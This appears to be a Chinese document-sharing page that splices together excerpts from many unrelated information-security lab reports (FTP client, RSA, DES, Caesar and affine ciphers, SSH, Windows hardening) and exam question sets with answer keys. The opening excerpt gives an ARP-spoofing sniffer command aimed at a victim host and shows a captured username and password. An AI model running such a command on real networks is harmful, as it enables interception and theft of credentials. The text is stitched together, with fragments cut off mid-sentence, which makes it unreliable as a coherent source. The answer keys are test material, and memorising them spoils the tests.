步骤一：运行cmd.exe,依次输入以下命令： "arpsf.exe -sniffall -o f:\sniffer.txt -g 192.168.137.1 -t 192.168.137.5"（其中IP地址：192.168.137.1是局域网网关的地址，192.168.137.5是被欺骗主机的IP地址，试验获取的数据将会被输入到F盘的sniffer.txt文件中。）按回车键运行，出现如下图所示的选项，选1，接着选0，回车，程序便开始监听了。运行截图：步骤二：停止运行，打开F盘的sniffer.txt文件，在文件中查找，可以发现被欺骗主机的一些敏感信息，如下图：可以发现被欺骗主机注册某网站时的信息：username=wanglouanquan password=123456等。捕获信息截图：

网络与信息安全实验报告

目录 1 绪论 (2) 1.1 研究背景 (2) 1.2 主要工作 (2) 2 相关知识介绍 (2) 2.1 FTP 工作原理 (2) 2.2 FTP工作模式 (3) 2.3 FTP 传输模式 (4) 2.3.1 A SCII传输方式 (5) 2.3.2二进制传输方式 (5) 3 FTP客户端的设计 (5) 3.1设计目的及工具选择 (5) 3.1.1设计目的 (5) 3.1.2设计工具 (6) 3.2 客户端主要模块设计 (6) 3.2.1客户端连接模块 (6) 3.2.2上传模块 (9) 3.2.3下载模块 (12) 4 调试与操作说明 (15) 4.1 运行方法 (15) 4.2运行结果 (15) 5 课程设计总结 (17) 参考文献 (17)

FTP客户端的设计与实现 FTP 是Internet 上用来传送文件的协议。它是为了我们能够在Internet 上互相传送文件而制定的文件传送标准，规定了Internet 上文件如何传送。通过FTP 协议，我们就可以跟Internet 上的FTP 服务器进行文件的上传或下载。本文以实现一个简单易用的FTP 客户端为目标，通过分析FTP 协议的基本工作原理和FTP 的数据传输原理，研究如何使用C++ 工具对FTP 客户端进行设计，选择C++来实现FTP 客户端程序的上传下载等主要功能，并用相应软件提供的一个支持可视化编程的开发环境，从而实现了对FTP 客户端的实现。 1 绪论 1.1 研究背景 FTP是Internet上最早也是最广的应用，直到今天它仍是最重要和最基本的应用之一。用FTP 将信息下载到本地是一件十分普遍的事。也随之出现了许多下载软件。尽管远程登录（Telnet）提供了访问远程文件的极好方法，但怎么也比不上使用自己计算机中的文件方便。如果用户想使用其它计算机上的文件，最理想的方法就是把它COPY到自己的计算机中，以便在本地计算机上操作。FTP正是完成这项工作的工具，你可以在任意一个经过文件传输协议（FTP）访问的公共有效的联机数据库或文档中找到你想要的任何东西。全世界现在已有1000多个（96 年的数据）FTP文件服务器对所有INTERNET用户开使用，用户可以通过与Internet相连到远程计算机，把自己需要的文件传输过来或是把自己的收集传输上去与他人共享。传统的数据库应用系统采用的是客户机/服务器(Client/Server)模式，有高度的交互性,高效的用户界面等优点 1.2 主要工作通过客户端可以实现文件的上传和下载。其促进文件的共享（计算机程序或数据）、鼓励间接或者隐式的使用远程计算机、向用户屏蔽不同主机中各种文件存储系统的细节和可靠和高效的传输数据。 2 相关知识介绍 2.1 FTP 工作原理 FTP（File Transfer Protocol），是文件传输协议的简称。用于Internet上的控制文件的双向传输。同时，它也是一个应用程序。用户可以通过它把自己机器与世界各地所有运FTP协议的服务器相连，访问服务器上的资源和信息。 FTP协议在TCP/IP协议栈中的位置如表1：端程序，它向FTP服务器提出拷贝文件的请求。另一个是启动在远程计算机的上的FTP服务器程序，它响应请求把你指定的文件传送到你的计算机中。FTP采用“客户端/服务器”方式，用户要在自己的本地计算机上安装FTP客户端程序。从根本上说，FTP协议就是在网络中各种不同的计算机之间按照TCP/IP协议来传输文件。FTP协议采用客户端/服务器(Client/Sever)模式，由FTP客户端程序和FTP服务器端程序组成。使用时，先启动FTP客户端程序与远程主机建立连接，然后向远程主机发出传输命令，远程主机在收到命令后就给予响应，并执行正确的命令。但是FTP 有一个根本的限制，那就是，如果用户在某个主机上没有注册获得授权，即没有用户名和口令，就不能与该主机进行文件传输。但匿名FTP服务器除外，它能够使用户与远程主机建立连接并以匿名身份从远程主机上拷贝文件，而不必是该远程主机的注册用户。用户使用特殊的用户名“Anonymous”或“guest”就可有限制地访问远程主机上公开的文件。现在许多系统要求用户将Emai1地址作为口令，以便更好地对访问者进行跟综。出于安全的目的，大部分匿名FTP主机一般只允许远程用户下载文件，而不允许上载文件。也就是说，用户只能从匿名FTP主机拷贝其需要的文件而不能把文件拷贝到匿名FTP主机。另外，匿名FTP主机还采用了其他一些保护措施以保护自己的文件不至于被用户修改和删除，并防止计算机病毒的侵入。匿名FTP一直是Internet上获取信息资源的最主要方式，在Internet成千上万的匿名FTP主机中存储着无以计数的文件，这些文件包含了各种各样的信息、数据和软件。人们只要知道特定信息资源的主机地址，就可以用匿名FTP登陆。

信息安全技术试题答案C

信息安全技术试题答案C 1、通常为保证信息处理对象的认证性采用的手段是___C_______ A、信息加密和解密 B、信息隐匿 C、数字签名和身份认证技术 D、数字水印 2、关于Diffie-Hellman算法描述正确的是____B______ A、它是一个安全的接入控制协议 B、它是一个安全的密钥分配协议 C、中间人看不到任何交换的信息 D、它是由第三方来保证安全的 3、以下哪一项不在证书数据的组成中? _____D_____ A、版本信息 B、有效使用期限 C、签名算法 D、版权信息 4、关于双联签名描述正确的是____D______ A、一个用户对同一消息做两次签名 B、两个用户分别对同一消息签名 C、对两个有联系的消息分别签名 D、对两个有联系的消息同时签名 5、Kerberos中最重要的问题是它严重依赖于____C______ A、服务器 B、口令 C、时钟 D、密钥 6、网络安全的最后一道防线是____A______ A、数据加密 B、访问控制

C、接入控制 D、身份识别 7、关于加密桥技术实现的描述正确的是____A______ A、与密码设备无关，与密码算法无关 B、与密码设备有关，与密码算法无关 C、与密码设备无关，与密码算法有关 D、与密码设备有关，与密码算法有关 8、身份认证中的证书由____A______ A、政府机构发行 B、银行发行 C、企业团体或行业协会发行 D、认证授权机构发行 9、称为访问控制保护级别的是____C______ A、C1 B、B1 C、C2 D、B2 10、DES的解密和加密使用相同的算法，只是将什么的使用次序反过来? ____C______ A、密码 B、密文 C、子密钥 D、密钥 11、PKI的性能中，信息通信安全通信的关键是_____C_____ A、透明性 B、易用性 C、互操作性 D、跨平台性

华北电力大学-网络信息安全综合实验报告

. 综合实验报告 ( 2013 -- 2014 年度第 1 学期) 名称：网络信息安全综合实验题目：RSA公钥加密解密院系：计算机系班级：网络工程学号：学生姓名：指导教师：李天设计周数： 1 周成绩：

日期： 2013年1月18日

一、综合实验的目的与要求要求：了解RSA产生公钥和私钥的方法，掌握RSA 的加密、解密过程，编写程序设计RSA 加解密工具。 RSA加解密参考：RSA的安全性依赖于大数分解，公钥和私钥都是两个大素数（大于100个十进制位）的函数。据猜测，从一个密钥和密文推断出明文的难度等同于分解两个大素数的积。密钥的产生： 1. 选择两个保密的大素数p和q； 2. 计算n=p*q和欧拉函数值E(n)=(p-1)(q-1)； 3. 选一整数e，且满足1=q ；C=Sum[i=0 to n](C[i]*0x10000**i)=A+B。如果用carry[i]记录每次的进位则有：C[i]=A[i]+B[i]+carry[i-1]-carry[i]*0x10000，其中carry[-1]=0。若A[i]+B[i]+carry[i-1]>0xffffffff，则carry[i]=1；反之则carry[i]=0，若carry[p]=0，则n=p；反之则n=p+1。减法与加法同理。

信息安全技术实验报告

《信息安全技术》实验报告学院计算机科学与工程学院学号姓名

实验一、DES加解密算法一、实验目的 1. 学会并实现DES算法 2. 理解对称密码体制的基本思想 3. 掌握数据加密和解密的基本过程二、实验内容根据DES加密标准，用C++设计编写符合DES算法思想的加、解密程序，能够实现对字符串和数组的加密和解密。三、实验的原理美国IBM公司W. Tuchman 和 C. Meyer 1971-1972年研制成功。1967年美国Horst Feistel提出的理论。美国国家标准局（NBS)1973年5月到1974年8月两次发布通告，公开征求用于电子计算机的加密算法。经评选从一大批算法中采纳了IBM的LUCIFER方案。 DES算法1975年3月公开发表，1977年1月15日由美国国家标准局颁布为联邦数据加密标准（Data Encryption Standard），于1977年7月15日生效。为二进制编码数据设计的，可以对计算机数据进行密码保护的数学运算。DES 的保密性仅取决于对密钥的保密，而算法是公开的。 64位明文变换到64位密文，密钥64位，实际可用密钥长度为56位。

运行结果: 四、思考题 1．分析影响DES密码体制安全的因素？答: 影响DES密码体制安全的因素主要是密钥的健壮性。 2．公钥算法中加密算法和解密算法有何步骤？答:DES密码体制中加密算法和解密算法流程相同，区别在于解密使用的子密钥和加密的子密钥相反

实验二、操作系统安全配置一、实验目的 1．熟悉Windows NT/XP/2000系统的安全配置 2. 理解可信计算机评价准则二、实验内容 1.Windows系统注册表的配置点击“开始\运行”选项，键入“regedit”命令打开注册表编辑器，学习并修改有关网络及安全的一些表项 2．Windows系统的安全服务 a．打开“控制面板\管理工具\本地安全策略”，查阅并修改有效项目的设置。b．打开“控制面板\管理工具\事件查看器”，查阅并理解系统日志，选几例，分析并说明不同类型的事件含义。 3. IE浏览器安全设置打开Internet Explorer菜单栏上的“工具\Internet选项”，调整或修改“安全”、“隐私”、“内容”等栏目的设置，分析、观察并验证你的修改。 4. Internet 信息服务安全设置打开“控制面板\管理工具\Internet 信息服务”，修改有关网络及安全的一些设置，并启动WWW或FTP服务器验证（最好与邻座同学配合）。三、实验过程 1. Windows系统注册表的配置点击“开始\运行”选项，键入“regedit”命令打开注册表编辑器，图如下：禁止修改显示属性 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Polic ies\System 在右边的窗口中创建一个DOWRD值：“NodispCPL”，并将其值设为“1”。

信息安全实验报告

兰州商学院陇桥学院信息工程系课程实验报告课程名称：信息安全技术班级：2011级信息管理与信息系统班学号：20110651123 姓名：潘存利指导教师：于泳海 2014年12 月20日

《信息安全》实验报告（一）实验名称：______________指导教师：_______完成日期：__________ 专业：_______________班级：_________姓名： _________ 二、实验内容： 1、编程实现凯撒密码的加密和解密。要求：既可以进行加密转换，也可以进行解密转换。程序参考界面如右所示。可以使用任何编程工具，能处理英文即可。 2、（选做）编程实现维吉尼亚密码的加密和解密。要求：既可以进行加密转换，也可以进行解密转换。程序参考界面如右所示。可以使用任何编程工具，能处理英文即可。三、程序设计说明：(实现步骤、算法设计思路、流程图等) 1.实现步骤（1）首先建立相应的界面做好准备工作，如下图所示（2）首先在加密按钮下添加相应的代码 private void button1_Click(object sender, EventArgs e) { string 明文字母表="abcdefghijklmnopqrstuvwxyz"; string 密文字母表 = "defghijklmnopqrstuvwxyzabc"; string 明文 = textBox1.Text; for (int i = 0; i <明文.Length; i++) { string 要加密字母 = 明文.Substring(i, 1); int 位置 = 明文字母表.IndexOf(要加密字母); string 加密后字母 = 密文字母表.Substring(位置, 1); 凯撒密码的实现于泳海 2014-09-12 11信本潘存利信息管理与信息系统

网络与信息安全技术考试试题及答案

网络与信息安全技术A卷一、单项选择题（每小题2分，共20分） 1．信息安全的基本属性是＿＿＿。 A. 保密性 B.完整性 C. 可用性、可控性、可靠性 D. A，B，C都是 2．假设使用一种加密算法，它的加密方法很简单：将每一个字母加5，即a加密成f。这种算法的密钥就是5，那么它属于＿＿＿。 A. 对称加密技术 B. 分组密码技术 C. 公钥加密技术 D. 单向函数密码技术 3．密码学的目的是＿＿＿。 A. 研究数据加密 B. 研究数据解密 C. 研究数据保密 D. 研究信息安全 4．A方有一对密钥（K A公开，K A秘密），B方有一对密钥（K B公开，K B秘密），A方向B方发送数字签名M，对信息M加密为：M’= K B公开（K A秘密（M））。B 方收到密文的解密方案是＿＿＿。 A. K B公开（K A秘密（M’）） B. K A公开（K A公开（M’）） C. K A公开（K B秘密（M’）） D. K B秘密（K A秘密（M’））5．数字签名要预先使用单向Hash函数进行处理的原因是＿＿＿。 A. 多一道加密工序使密文更难破译 B. 提高密文的计算速度 C. 缩小签名密文的长度，加快数字签名和验证签名的运算速度 D. 保证密文能正确还原成明文 6．身份鉴别是安全服务中的重要一环，以下关于身份鉴别叙述不正确的是＿＿。 A. 身份鉴别是授权控制的基础 B. 身份鉴别一般不用提供双向的认证 C. 目前一般采用基于对称密钥加密或公开密钥加密的方法 D. 数字签名机制是实现身份鉴别的重要机制 7．防火墙用于将Internet和内部网络隔离＿＿＿。 A. 是防止Internet火灾的硬件设施 B. 是网络安全和信息安全的软件和硬件设施 C. 是保护线路不受破坏的软件和硬件设施 D. 是起抗电磁干扰作用的硬件设施

信息安全综合实践SSH实验报告及指导

《信息安全综合实践》实验报告实验名称：SSH实验姓名：李建辉学号： 5080369090 班级： F803604 实验日期：2010.12.22 一、实验目的 1.加深对密码算法使用的理解 2.进一步熟悉linux系统 3.了解和体验windows及linux环境下SSH的应用二、实验环境 1.SSH服务器：Ubuntu10.04版（虚拟机），装有openSSH, wireshark,xinetd， telnetd，采用桥接联网 2.SSH客户端： winXP SP3 装有 putty 0.60(windows下SSH登录) Ubuntu10.04 版，装有（虚拟机）openSSH, wireshark, xinetd，telnetd (Linux下SSH登录)采用桥接联网四、主要实验步骤及说明 0.实验准备（1）网络设置根据要求windows XP和虚拟机的网络设置如下： XP

Ip设为192.168.1.90 Ubuntu Ip设为192.168.1.190 （2）帐号设置：我自己设置了一个帐号myyh，另一个使用的是原有帐号super （3）SSH服务状况

SSH已启动，进程号是664 1.Windows下登录SSH服务器 1.1口令登录在windowsXP中打开putty工具，在session中填入虚拟机的ip以及默认端口22，点击open。如下图：以super帐户远程登录成功 1.2密钥登录 1)在服务端生成密钥对生成密钥对mybabyyh_rsa 查看刚才保存的公钥及私钥文件从上图中可以看出私钥为mybabyyh_rsa，公钥为mybabyyh_rsa.pub，我选

武汉理工大学信息安全实验报告

学生学号实验课成绩学生实验报告书实验课程名称信息安全开课学院计算机科学与技术学院指导教师姓名孙贤伟学生姓名学生专业班级软件工程zy1302班 2015-- 2016学年第一学期

实验课程名称：信息安全

第二部分：实验调试与结果分析一、调试过程（包括调试方法描述、实验数据记录，实验现象记录，实验过程发现的问题等）实验代码： #include #include int main() { char c[15] = "ybccnhfwblelho"; int cc[14]; for (int i = 0; i < 14; i++) { cc[i] = c[i] - 'a'; } char ccc[15]; ccc[14] = '\0'; for (int a = 0; a < 26; a++) { printf("%d:\n", a); for (int b = 0; b < 26; b++) { for (int i = 0; i < 14; i++) { ccc[i] = ((cc[i] * a) + b) % 26 + 'a'; } printf("%s\n", ccc); } } system("pause"); return 0; }

二、实验结果分析（包括结果描述、实验现象分析、影响因素讨论、综合分析和结论等） 1、利用程序穷举明文，找出有意义的字符串： 2、根据明文与密文的映射，列出方程组： 3、解方程组，得：三、小结、建议及体会通过本次实验，我初步学会了仿射变换在密码学中的应用，加深了对密码学的认识和兴趣。明文和密文之间的转换是十分有趣和具有挑战性的，这让我非常感兴趣。总而言之，本次实验我收获很多，以后也会继续努力学习信息安全，认真完成每一次实验。

信息安全技术试题答案(全)

信息安全技术教程习题及答案信息安全试题（1/共3）一、单项选择题（每小题2分，共20分） 1．信息安全的基本属性是＿＿＿。 A. 保密性 B.完整性 C. 可用性、可控性、可靠性 D. A，B，C都是 2．假设使用一种加密算法，它的加密方法很简单：将每一个字母加5，即a加密成f。这种算法的密钥就是5，那么它属于＿＿＿。 A. 对称加密技术 B. 分组密码技术 C. 公钥加密技术 D. 单向函数密码技术 3．密码学的目的是＿＿＿。 A. 研究数据加密 B. 研究数据解密 C. 研究数据保密 D. 研究信息安全 4．A方有一对密钥（K A公开，K A秘密），B方有一对密钥（K B公开，K B秘密），A方向B方发送数字签名M，对信息 M加密为：M’= K B公开（K A秘密（M））。B方收到密文的解密方案是＿＿＿。 A. K B公开（K A秘密（M’）） B. K A公开（K A公开（M’）） C. K A公开（K B秘密（M’）） D. K B秘密（K A秘密（M’）） 5．数字签名要预先使用单向Hash函数进行处理的原因是＿＿＿。 A. 多一道加密工序使密文更难破译 B. 提高密文的计算速度 C. 缩小签名密文的长度，加快数字签名和验证签名的运算速度 D. 保证密文能正确还原成明文 6．身份鉴别是安全服务中的重要一环，以下关于身份鉴别叙述不正确的是＿＿。 A. 身份鉴别是授权控制的基础 B. 身份鉴别一般不用提供双向的认证 C. 目前一般采用基于对称密钥加密或公开密钥加密的方法 D. 数字签名机制是实现身份鉴别的重要机制 7．防火墙用于将Internet和内部网络隔离＿＿＿。 A. 是防止Internet火灾的硬件设施 B. 是网络安全和信息安全的软件和硬件设施 C. 是保护线路不受破坏的软件和硬件设施 D. 是起抗电磁干扰作用的硬件设施 8．PKI支持的服务不包括＿＿＿。 A. 非对称密钥技术及证书管理 B. 目录服务 C. 对称密钥的产生和分发 D. 访问控制服务 9．设哈希函数H有128个可能的输出(即输出长度为128位)，如果H的k个随机输入中至少有两个产生相同输出的概率大于0.5，则k约等于＿＿。 A．2128 B．264

信息安全实验报告

信息安全基础实验报告

信息安全技术试题答案全面

《信息安全技术》实验4基于PGP的Email安全安全通信实验实验报告

信息安全技术试题答案A

信息安全实验报告五分析

信息安全技术试题答案E.docx

信息安全实验报告

最新信息安全技术试题答案D

网络与信息安全实验报告

信息安全技术试题答案C

华北电力大学-网络信息安全综合实验报告

信息安全技术实验报告

信息安全实验报告

网络与信息安全技术考试试题及答案

信息安全综合实践SSH实验报告及指导

武汉理工大学信息安全实验报告

信息安全技术试题答案(全)